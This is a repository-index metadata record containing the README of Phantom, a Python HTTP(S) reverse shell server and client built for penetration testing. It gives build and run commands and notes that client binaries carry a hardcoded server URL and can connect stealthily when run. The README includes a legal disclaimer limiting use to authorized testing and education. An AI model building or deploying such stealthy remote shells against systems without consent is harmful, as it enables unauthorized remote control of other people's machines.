{"id":20276693,"url":"https://github.com/eonraider/bca-phantom","last_synced_at":"2025-04-11T05:43:03.269Z","repository":{"id":41236141,"uuid":"422945991","full_name":"EONRaider/BCA-Phantom","owner":"EONRaider","description":"A multi-platform HTTP(S) Reverse Shell Server and Client in Python 3","archived":false,"fork":false,"pushed_at":"2023-02-08T02:15:57.000Z","size":39514,"stargazers_count":100,"open_issues_count":1,"forks_count":8,"subscribers_count":4,"default_branch":"master","last_synced_at":"2025-03-25T03:41:56.957Z","etag":null,"topics":["http-client","http-server","network-programming","penetration-testing-tools","red-teaming","reverse-shell","security-tools"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"agpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/EONRaider.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-10-30T17:21:21.000Z","updated_at":"2025-02-19T19:43:20.000Z","dependencies_parsed_at":"2022-07-10T16:17:15.460Z","dependency_job_id":null,"html_url":"https://github.com/EONRaider/BCA-Phantom","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EONRaider%2FBCA-Phantom","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EONRaider%2FBCA-Phantom/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EONRaider%2FBCA-Phantom/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EONRaider%2FBCA-Phantom/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/EONRaider","download_url":"https://codeload.github.com/EONRaider/BCA-Phantom/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248351449,"owners_count":21089270,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["http-client","http-server","network-programming","penetration-testing-tools","red-teaming","reverse-shell","security-tools"],"created_at":"2024-11-14T13:15:12.309Z","updated_at":"2025-04-11T05:43:03.235Z","avatar_url":"https://github.com/EONRaider.png","language":"Python","readme":"# Phantom - A multi-platform HTTP(S) Reverse Shell Server and Client\n\n![Python Version](https://img.shields.io/badge/python-3.9+-blue?style=for-the-badge\u0026logo=python)\n[![CodeFactor Grade](https://img.shields.io/codefactor/grade/github/EONRaider/BCA-Phantom?label=CodeFactor\u0026logo=codefactor\u0026style=for-the-badge)](https://www.codefactor.io/repository/github/EONRaider/BCA-Phantom)\n![OS](https://img.shields.io/badge/GNU%2FLinux-red?style=for-the-badge\u0026logo=linux)\n![OS](https://img.shields.io/badge/Windows-blue?style=for-the-badge\u0026logo=windows)\n\n[![Reddit](https://img.shields.io/badge/Reddit-EONRaider-FF4500?style=flat-square\u0026logo=reddit)](https://www.reddit.com/user/eonraider)\n[![Discord](https://img.shields.io/badge/Discord-EONRaider-7289DA?style=flat-square\u0026logo=discord)](https://discord.gg/KVjWBptv)\n[![Twitter](https://img.shields.io/badge/Twitter-eon__raider-38A1F3?style=flat-square\u0026logo=twitter)](https://twitter.com/intent/follow?screen_name=eon_raider)\n\nPhantom is a **multi-platform HTTP(S) Reverse Shell** server and client in Python 3. Binaries for\nLinux and Windows platforms can be built through an embedded script that executes \nPyInstaller.\n\nReverse shells can be established through HTTP or HTTPS. The certificates used for \nHTTPS can be auto-generated by Phantom or supplied by the user.\n\nPhantom includes a helper shell script that enables fast generation of\nself-signed certificates for use of both servers and clients. After generation, the\nserver and certificate authority certificates required for encrypted connections \nare bundled in the binaries for portability and ease of execution.\n\n## Demo\n![demo](https://github.com/EONRaider/static/blob/70ea04684f47e1314a95152a290d1e1d137784cd/phantom/usage.gif)\n\n## Try it out!\nSimply head over to the [dist directory](https://github.com/EONRaider/BCA-Phantom/tree/master/dist) \nand download the pre-built Linux/Unix or Windows binaries.\n\nThe HTTP client files are set to connect to http://localhost:8080, whereas the HTTPS client bundles a CA certificate file for https://localhost:4443 and will\nonly connect to this socket. With that in mind, choose either HTTP or HTTPS and run the server on one shell:\n```shell\n./linux_server http://localhost:8080\n            \u003c-- or --\u003e\n./linux_server https://localhost:4443\n```\nAnd the client on another one...\n```shell\n./http_linux_client\n     \u003c-- or --\u003e\n./https_linux_client\n```\nThe same procedure works for the Windows binaries.\n\n## Setup\n### HTTP Server and Client\n*You don't need to set up the server and client for HTTP connections.* The server will \nwork straight out-of-the-box and the client will connect to any HTTP server. Just [download \nthe HTTP binaries from dist](https://github.com/EONRaider/BCA-Phantom/tree/master/dist) \nand you're done. Execute the binaries with the `--help` option for instructions.\n\n### HTTPS Server and Client\nEncrypted communication through HTTPS requires at least two certificates: One for \nthe server, named `server.pem` by default, and another for the certificate authority, or `ca.pem`. \nPhantom bundles both files in binaries for fast deployment. They can be \ngenerated by [multiple methods](https://www.digitalocean.com/community/tutorials/openssl-essentials-working-with-ssl-certificates-private-keys-and-csrs) \nor by a simple execution of the [generate_certs.sh](https://github.com/EONRaider/BCA-Phantom/blob/master/src/generate_certs.sh) helper script.\n\nOnce the certificates are ready you only need to follow the steps from the Build and Run\nsection below.\n\n## Build and Run an HTTPS Server/Client\n### I. Install Dependencies\nDependency management works with both [Poetry](https://python-poetry.org/) (recommended)\nand [Virtualenv](https://virtualenv.pypa.io/en/latest/). You need to install all \ndependencies before building binaries.\n```shell\ngit clone https://github.com/EONRaider/BCA-Phantom.git\ncd BCA-Phantom\npoetry install \u003c--or--\u003e pip install -r requirements.txt\n```\n\n### II. Build HTTPS Server and Client binaries\nThe `build.py` file centralizes the process and takes care of it all. Notice that \na built Client binary contains a *hardcoded server URL*. **The connection to the server can \nbe stealthily performed by simply executing the binary.**\n- Build and run the **Server**\n    ```shell\n    python build.py server --server-cert /path/to/server.pem\n    ./linux_server SERVER_URL\n    ```\n- Build and run the **Client**\n  ```shell\n  python build.py client --url SERVER_URL --ca-cert /path/to/ca.pem\n  ./https_linux_client\n  ```\nThe same procedure works for the Windows binaries.\n\n## Legal Disclaimer\nThe use of code contained in this repository, either in part or in its totality,\nfor engaging targets without prior mutual consent is illegal. **It is\nthe end user's responsibility to obey all applicable local, state and\nfederal laws.**\n\nDevelopers assume **no liability** and are not\nresponsible for misuses or damages caused by any code contained\nin this repository in any event that, accidentally or otherwise, it comes to\nbe utilized by a threat agent or unauthorized entity as a means to compromise\nthe security, privacy, confidentiality, integrity, and/or availability of\nsystems and their associated resources. In this context the term \"compromise\" is\nhenceforth understood as the leverage of exploitation of known or unknown vulnerabilities\npresent in said systems, including, but not limited to, the implementation of\nsecurity controls, human- or electronically-enabled.\n\nThe use of this code is **only** endorsed by the developers in those\ncircumstances directly related to **educational environments** or\n**authorized penetration testing engagements** whose declared purpose is that\nof finding and mitigating vulnerabilities in systems, limiting their exposure\nto compromises and exploits employed by malicious agents as defined in their\nrespective threat models.\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Feonraider%2Fbca-phantom","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Feonraider%2Fbca-phantom","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Feonraider%2Fbca-phantom/lists"}